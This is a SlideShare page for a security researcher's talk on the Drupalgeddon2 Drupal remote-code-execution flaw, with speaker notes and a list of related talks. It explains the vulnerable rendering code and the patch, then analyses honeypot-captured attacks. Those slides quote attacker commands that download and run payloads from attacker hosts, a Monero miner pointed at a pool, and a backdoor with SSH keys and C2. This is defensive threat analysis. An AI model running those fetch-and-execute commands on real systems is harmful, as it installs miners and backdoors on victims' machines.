SlideShare a Scribd company logo
1© 2017 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
DRUPALGEDDON2 –
YET ANOTHER WEAPON
FOR THE ATTACKER
Radu - Emanuel Chișcariu, Security Research Engineer
3© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
DRUPALGEDDON2 (CVE-2018-7600)
• Remote Code Execution
• Over HTTP
• Identified by Drupal Security Team
Affected versions:
7.x up to 7.58
8.x up to 8.3.9
8.4.x up to 8.4.6
8.5.x up to 8.5.1
TLDR: all of them
4© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
FOLLOW-UP: DRUPALGEDDON3 (CVE-2018-7602)
• (Authenticated) Remote Code Execution
• Over HTTP
• Identified by Drupal Security Team
Affected versions:
7.x up to 7.59
8.x up to 8.4.8
8.5.x up to 8.5.3
5© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
ATTACK TIMELINE
6© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
ATTACK TIMELINE
7© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
ATTACK TIMELINE
8© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
ATTACK TIMELINE
9© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
DRUPAL : CORE FUNCTIONALITY
• Form API
• Renderable Arrays
• Properties :
• array key , "#" prefixed
• Form elements
• no prefix on array keys
10© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
What happens with an user request?
Client Request
param/value
pairs
Form_array =>
$elements
doRender()
- callbacks
DRUPAL : CORE FUNCTIONALITY
● User request => create renderable arrays
of components
● Callback functions invoked during rendering
11© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
Where is the vulnerability?
DRUPALGEDDON2 : VULNERABLE CODE
User request => components rendered by doRender()
12© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
Where is the entry point?
DRUPALGEDDON2 : VULNERABLE CODE
13© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
PoC is publicly available
DRUPALGEDDON2 - EXPLOIT
14© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
How did the Drupal Team patched the vulnerability?
DRUPALGEDDON2 - PATCH
A CRITICAL SECURITY update : "adding input sanitization"
15© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
ACTIVITY IN THE WILD
What was the malicious activity?
11 events: Saturday, April, 14, 2018
637 events: Saturday, April, 21, 2018
1609 events: Monday, May, 7, 2018
16© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
ACTIVITY IN THE WILD
17© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
HOW DO THE ATTACKS LOOK LIKE?
● Sample #1 : PHP Agent
# wget http://igaqd.hide-yoshi.net/mimetypes.php
18© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
SAMPLE #1 : OBFUSCATED PHP AGENT
19© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
SAMPLE #1 : PHP FILE UPLOADER
20© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
# curl -fsSL http://chrome.zer0day.ru:5050/mrx1 -o /tmp/yum.lock && sh /tmp/yum.lock
SAMPLE #2: SHELL SCRIPT
21© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
NO HONOR AMONGST THIEVES.
22© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
DEPENDENCIES
23© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
SSH BACKDOOR
24© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
START THE MINER AND PROFIT!
25© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
FURTHER INSPECTION
/tmp/migrations : /tmp/migrations -o pool.zer0day.ru:8080 -k -B
/tmp/clay: executed directly
26© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
LET’S CHECK THE MIGRATIONS FILE
27© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
Dependencies
28© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
DependenciesMONERO FOR THE WIN!
29© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
FURTHER INSPECTION
We saw the /tmp/migrations file.
What about the /tmp/clay ?
30© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
31© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
THOSE BOTNET DIRECTIVES.
32© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
MAIN
● Anti-debugging
● Backdoor
33© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
BACKDOOR
MainBeikong()
- /tmp/bill.lock -> /etc/init.d/
- /tmp/gates.lod -> PID of trojan,
-> netstat, load, ps
- /tmp/moni.lod -> /proc/cpuinfo
MainMonitor()
- C2 communication
MainBackdoor()
- start as daemon()
- more resilient replication
34© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
SO ONE MORE MINER AND SLAVE FOR BOTNET!
35© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
WHAT HAVE WE LEARNED?
● Security through obscurity won’t work
● Hard release deadlines makes you write bad code
● Input sanitization doesn’t ever get old
Link for the full article:
@adur_cre
36© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |

More Related Content

Similar to Drupalgeddon 2 – Yet Another Weapon for the Attacker (20)

PDF
From Mirai to Monero – One Year’s Worth of Honeypot Data
DefCamp
 
PPTX
CASB: Securing your cloud applications
Forcepoint LLC
 
PDF
PIONEERING GEN V SECURITY WITH CHECK POINT
Technofutur TIC
 
PDF
Infosecurity - CDMX 2018
Miguel Hernández y López
 
PPTX
Microapps: Redefining Enterprise Mobility
Nischal Reddy
 
PPTX
Scrapping for Pennies: How to implement security without a budget
Ryan Wisniewski
 
PDF
Secure Clouds are Happy Clouds
2nd Watch
 
PDF
End to End Security - Check Point
Harry Gunns
 
PDF
CASB — Your new best friend for safe cloud adoption?
Digital Transformation EXPO Event Series
 
PDF
Infrastructure predictive monitoring with itoa jean louis baudoin, capgemini-...
Capgemini
 
PDF
Infrastructure predictive monitoring with itoa jean louis baudoin, capgemini-...
Capgemini
 
PPTX
apidays LIVE New York 2021 - Simplify Open Policy Agent with Styra DAS by Tim...
apidays
 
PPTX
Avr_presentation
Pakky .
 
PPTX
Avr presentation
พอแอกอ แพ็ก
 
PPTX
MASSIVE SCALE SECURITY FOR THE IoT
Juanjo MARTINEZ PAGAN
 
PPTX
A Definition of Done for DevSecOps
Gene Gotimer
 
PPTX
Ensure Every Customer Matters With End User Monitoring at AppD Global Tour Lo...
AppDynamics
 
PPTX
0Day to HeroDay: Surviving an Attack and Establishing a Security Organization
Ryan Wisniewski
 
PDF
DevOps Night - Shifting Security to the Left - SCTV Tower - 19 September 2018
Adhitya Hartowo
 
PPTX
Cloud Ramps Up at DOD--Here's What You Need to Know
immixGroup
 
From Mirai to Monero – One Year’s Worth of Honeypot Data
DefCamp
 
CASB: Securing your cloud applications
Forcepoint LLC
 
PIONEERING GEN V SECURITY WITH CHECK POINT
Technofutur TIC
 
Infosecurity - CDMX 2018
Miguel Hernández y López
 
Microapps: Redefining Enterprise Mobility
Nischal Reddy
 
Scrapping for Pennies: How to implement security without a budget
Ryan Wisniewski
 
Secure Clouds are Happy Clouds
2nd Watch
 
End to End Security - Check Point
Harry Gunns
 
CASB — Your new best friend for safe cloud adoption?
Digital Transformation EXPO Event Series
 
Infrastructure predictive monitoring with itoa jean louis baudoin, capgemini-...
Capgemini
 
Infrastructure predictive monitoring with itoa jean louis baudoin, capgemini-...
Capgemini
 
apidays LIVE New York 2021 - Simplify Open Policy Agent with Styra DAS by Tim...
apidays
 
Avr_presentation
Pakky .
 
MASSIVE SCALE SECURITY FOR THE IoT
Juanjo MARTINEZ PAGAN
 
A Definition of Done for DevSecOps
Gene Gotimer
 
Ensure Every Customer Matters With End User Monitoring at AppD Global Tour Lo...
AppDynamics
 
0Day to HeroDay: Surviving an Attack and Establishing a Security Organization
Ryan Wisniewski
 
DevOps Night - Shifting Security to the Left - SCTV Tower - 19 September 2018
Adhitya Hartowo
 
Cloud Ramps Up at DOD--Here's What You Need to Know
immixGroup
 

More from DefCamp (20)

PDF
Remote Yacht Hacking
DefCamp
 
PDF
Mobile, IoT, Clouds… It’s time to hire your own risk manager!
DefCamp
 
PPTX
The Charter of Trust
DefCamp
 
PPTX
Internet Balkanization: Why Are We Raising Borders Online?
DefCamp
 
PPTX
Bridging the gap between CyberSecurity R&D and UX
DefCamp
 
PPTX
Secure and privacy-preserving data transmission and processing using homomorp...
DefCamp
 
PPTX
Economical Denial of Sustainability in the Cloud (EDOS)
DefCamp
 
PPTX
Trust, but verify – Bypassing MFA
DefCamp
 
PPTX
Threat Hunting: From Platitudes to Practical Application
DefCamp
 
PPTX
Building application security with 0 money down
DefCamp
 
PPTX
Implementation of information security techniques on modern android based Kio...
DefCamp
 
PPTX
Lattice based Merkle for post-quantum epoch
DefCamp
 
PPTX
The challenge of building a secure and safe digital environment in healthcare
DefCamp
 
PPTX
Timing attacks against web applications: Are they still practical?
DefCamp
 
PPTX
Tor .onions: The Good, The Rotten and The Misconfigured
DefCamp
 
PPTX
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...
DefCamp
 
PPTX
We will charge you. How to [b]reach vendor’s network using EV charging station.
DefCamp
 
PPTX
Connect & Inspire Cyber Security
DefCamp
 
PPTX
The lions and the watering hole
DefCamp
 
PPTX
Catch Me If You Can - Finding APTs in your network
DefCamp
 
Remote Yacht Hacking
DefCamp
 
Mobile, IoT, Clouds… It’s time to hire your own risk manager!
DefCamp
 
The Charter of Trust
DefCamp
 
Internet Balkanization: Why Are We Raising Borders Online?
DefCamp
 
Bridging the gap between CyberSecurity R&D and UX
DefCamp
 
Secure and privacy-preserving data transmission and processing using homomorp...
DefCamp
 
Economical Denial of Sustainability in the Cloud (EDOS)
DefCamp
 
Trust, but verify – Bypassing MFA
DefCamp
 
Threat Hunting: From Platitudes to Practical Application
DefCamp
 
Building application security with 0 money down
DefCamp
 
Implementation of information security techniques on modern android based Kio...
DefCamp
 
Lattice based Merkle for post-quantum epoch
DefCamp
 
The challenge of building a secure and safe digital environment in healthcare
DefCamp
 
Timing attacks against web applications: Are they still practical?
DefCamp
 
Tor .onions: The Good, The Rotten and The Misconfigured
DefCamp
 
Needles, Haystacks and Algorithms: Using Machine Learning to detect complex t...
DefCamp
 
We will charge you. How to [b]reach vendor’s network using EV charging station.
DefCamp
 
Connect & Inspire Cyber Security
DefCamp
 
The lions and the watering hole
DefCamp
 
Catch Me If You Can - Finding APTs in your network
DefCamp
 
Ad

Recently uploaded (20)

PDF
Log-Based Anomaly Detection: Enhancing System Reliability with Machine Learning
Mohammed BEKKOUCHE
 
PDF
Fl Studio 24.2.2 Build 4597 Crack for Windows Free Download 2025
faizk77g
 
PDF
Impact of IEEE Computer Society in Advancing Emerging Technologies including ...
Hironori Washizaki
 
PDF
NewMind AI Journal - Weekly Chronicles - July'25 Week II
NewMind AI
 
PDF
The Builder’s Playbook - 2025 State of AI Report.pdf
jeroen339954
 
PDF
July Patch Tuesday
Ivanti
 
PDF
DevBcn - Building 10x Organizations Using Modern Productivity Metrics
Justin Reock
 
PPTX
MSP360 Backup Scheduling and Retention Best Practices.pptx
MSP360
 
PDF
Chris Elwell Woburn, MA - Passionate About IT Innovation
Chris Elwell Woburn, MA
 
PDF
Complete JavaScript Notes: From Basics to Advanced Concepts.pdf
haydendavispro
 
PDF
Why Orbit Edge Tech is a Top Next JS Development Company in 2025
mahendraalaska08
 
PPTX
AUTOMATION AND ROBOTICS IN PHARMA INDUSTRY.pptx
sameeraaabegumm
 
PPT
Interview paper part 3, It is based on Interview Prep
SoumyadeepGhosh39
 
PDF
Using FME to Develop Self-Service CAD Applications for a Major UK Police Force
Safe Software
 
PPTX
Building Search Using OpenSearch: Limitations and Workarounds
Sease
 
PDF
Windsurf Meetup Ottawa 2025-07-12 - Planning Mode at Reliza.pdf
Pavel Shukhman
 
PPTX
WooCommerce Workshop: Bring Your Laptop
Laura Hartwig
 
PDF
TrustArc Webinar - Data Privacy Trends 2025: Mid-Year Insights & Program Stra...
TrustArc
 
PDF
Predicting the unpredictable: re-engineering recommendation algorithms for fr...
Speck&Tech
 
PDF
Human-centred design in online workplace learning and relationship to engagem...
Tracy Tang
 
Log-Based Anomaly Detection: Enhancing System Reliability with Machine Learning
Mohammed BEKKOUCHE
 
Fl Studio 24.2.2 Build 4597 Crack for Windows Free Download 2025
faizk77g
 
Impact of IEEE Computer Society in Advancing Emerging Technologies including ...
Hironori Washizaki
 
NewMind AI Journal - Weekly Chronicles - July'25 Week II
NewMind AI
 
The Builder’s Playbook - 2025 State of AI Report.pdf
jeroen339954
 
July Patch Tuesday
Ivanti
 
DevBcn - Building 10x Organizations Using Modern Productivity Metrics
Justin Reock
 
MSP360 Backup Scheduling and Retention Best Practices.pptx
MSP360
 
Chris Elwell Woburn, MA - Passionate About IT Innovation
Chris Elwell Woburn, MA
 
Complete JavaScript Notes: From Basics to Advanced Concepts.pdf
haydendavispro
 
Why Orbit Edge Tech is a Top Next JS Development Company in 2025
mahendraalaska08
 
AUTOMATION AND ROBOTICS IN PHARMA INDUSTRY.pptx
sameeraaabegumm
 
Interview paper part 3, It is based on Interview Prep
SoumyadeepGhosh39
 
Using FME to Develop Self-Service CAD Applications for a Major UK Police Force
Safe Software
 
Building Search Using OpenSearch: Limitations and Workarounds
Sease
 
Windsurf Meetup Ottawa 2025-07-12 - Planning Mode at Reliza.pdf
Pavel Shukhman
 
WooCommerce Workshop: Bring Your Laptop
Laura Hartwig
 
TrustArc Webinar - Data Privacy Trends 2025: Mid-Year Insights & Program Stra...
TrustArc
 
Predicting the unpredictable: re-engineering recommendation algorithms for fr...
Speck&Tech
 
Human-centred design in online workplace learning and relationship to engagem...
Tracy Tang
 
Ad

Drupalgeddon 2 – Yet Another Weapon for the Attacker

  • 1. 1© 2017 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | DRUPALGEDDON2 – YET ANOTHER WEAPON FOR THE ATTACKER Radu - Emanuel Chișcariu, Security Research Engineer
  • 2. 3© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | DRUPALGEDDON2 (CVE-2018-7600) • Remote Code Execution • Over HTTP • Identified by Drupal Security Team Affected versions: 7.x up to 7.58 8.x up to 8.3.9 8.4.x up to 8.4.6 8.5.x up to 8.5.1 TLDR: all of them
  • 3. 4© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | FOLLOW-UP: DRUPALGEDDON3 (CVE-2018-7602) • (Authenticated) Remote Code Execution • Over HTTP • Identified by Drupal Security Team Affected versions: 7.x up to 7.59 8.x up to 8.4.8 8.5.x up to 8.5.3
  • 4. 5© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | ATTACK TIMELINE
  • 5. 6© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | ATTACK TIMELINE
  • 6. 7© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | ATTACK TIMELINE
  • 7. 8© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | ATTACK TIMELINE
  • 8. 9© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | DRUPAL : CORE FUNCTIONALITY • Form API • Renderable Arrays • Properties : • array key , "#" prefixed • Form elements • no prefix on array keys
  • 9. 10© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | What happens with an user request? Client Request param/value pairs Form_array => $elements doRender() - callbacks DRUPAL : CORE FUNCTIONALITY ● User request => create renderable arrays of components ● Callback functions invoked during rendering
  • 10. 11© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | Where is the vulnerability? DRUPALGEDDON2 : VULNERABLE CODE User request => components rendered by doRender()
  • 11. 12© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | Where is the entry point? DRUPALGEDDON2 : VULNERABLE CODE
  • 12. 13© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | PoC is publicly available DRUPALGEDDON2 - EXPLOIT
  • 13. 14© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | How did the Drupal Team patched the vulnerability? DRUPALGEDDON2 - PATCH A CRITICAL SECURITY update : "adding input sanitization"
  • 14. 15© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | ACTIVITY IN THE WILD What was the malicious activity? 11 events: Saturday, April, 14, 2018 637 events: Saturday, April, 21, 2018 1609 events: Monday, May, 7, 2018
  • 15. 16© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | ACTIVITY IN THE WILD
  • 16. 17© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | HOW DO THE ATTACKS LOOK LIKE? ● Sample #1 : PHP Agent # wget http://igaqd.hide-yoshi.net/mimetypes.php
  • 17. 18© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | SAMPLE #1 : OBFUSCATED PHP AGENT
  • 18. 19© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | SAMPLE #1 : PHP FILE UPLOADER
  • 19. 20© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | # curl -fsSL http://chrome.zer0day.ru:5050/mrx1 -o /tmp/yum.lock && sh /tmp/yum.lock SAMPLE #2: SHELL SCRIPT
  • 20. 21© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | NO HONOR AMONGST THIEVES.
  • 21. 22© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | DEPENDENCIES
  • 22. 23© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | SSH BACKDOOR
  • 23. 24© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | START THE MINER AND PROFIT!
  • 24. 25© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | FURTHER INSPECTION /tmp/migrations : /tmp/migrations -o pool.zer0day.ru:8080 -k -B /tmp/clay: executed directly
  • 25. 26© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | LET’S CHECK THE MIGRATIONS FILE
  • 26. 27© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | Dependencies
  • 27. 28© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | DependenciesMONERO FOR THE WIN!
  • 28. 29© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | FURTHER INSPECTION We saw the /tmp/migrations file. What about the /tmp/clay ?
  • 29. 30© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |
  • 30. 31© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | THOSE BOTNET DIRECTIVES.
  • 31. 32© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | MAIN ● Anti-debugging ● Backdoor
  • 32. 33© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | BACKDOOR MainBeikong() - /tmp/bill.lock -> /etc/init.d/ - /tmp/gates.lod -> PID of trojan, -> netstat, load, ps - /tmp/moni.lod -> /proc/cpuinfo MainMonitor() - C2 communication MainBackdoor() - start as daemon() - more resilient replication
  • 33. 34© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | SO ONE MORE MINER AND SLAVE FOR BOTNET!
  • 34. 35© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. | WHAT HAVE WE LEARNED? ● Security through obscurity won’t work ● Hard release deadlines makes you write bad code ● Input sanitization doesn’t ever get old Link for the full article: @adur_cre
  • 35. 36© 2018 KEYSIGHT AND/OR ITS AFFILIATES. ALL RIGHTS RESERVED. |

Editor's Notes

  • #2: My name Positon Web application vulnerability that appeared this year
  • #4: RCE A lot of articles appeared starting with 16th April It seemed to affect all versions of Drupal
  • #5: Moreover after two weeks or so Another wave of attacks after patch What happened User with limited permissions Interact with a confirmation form ()
  • #6: Fisrt patch 21 march
  • #7: Then It came the sec advis ( responsible disclosure)
  • #8: Then It came the public poc
  • #9: But a diff thing happened the second wave of attack First it came the exploit Then the patch and sec advisory, same day Full disclosure, The inpact seemed to be over 1 mil websites
  • #10: Before going through the vulnerable code,, Form API in processing and presenting forms. Building blocks : renderable arrays Map keys to HTML TAGS
  • #11: So what hap when The outcome of the rend
  • #12: Looking at the vulnerable code doRender takes care of the rendering resource requested by client It contains logic that, with respect to will render the page the form properties within the $elements array The form properties within the elements array will affect the rendering process
  • #13: The managed File. builds an AJAX response using the uploadAjaxCallback() function Looking at the vulnerable code doRender takes care of the rendering resource requested by client It contains logic that, with respect to will render the page the form properties within the $elements array The form properties within the elements array will affect the rendering process
  • #15: Filter all items starting with a hash sign they applied a general .. stripDangerousValues … hash sign This method sanitizes input data in $_GET, $_POST & $_COOKIES during the very early stages of Drupal’s bootstrap (immediately after loading the site configurations).
  • #16: 2 days after Cumulating The max number
  • #17: Our honeypots also report the source… Of course, It seems that
  • #22: - Terminate other mining process if found on the machine
  • #23: Install dependencies Ensure persistence with cron jobs
  • #24: Ensure attacker access by adding an authorized ssh key as a backdor, then download some resouces
  • #25: star
  • #32: Looking at the strings … Also, the found ip are reported
  • #34: collects relevant information about the system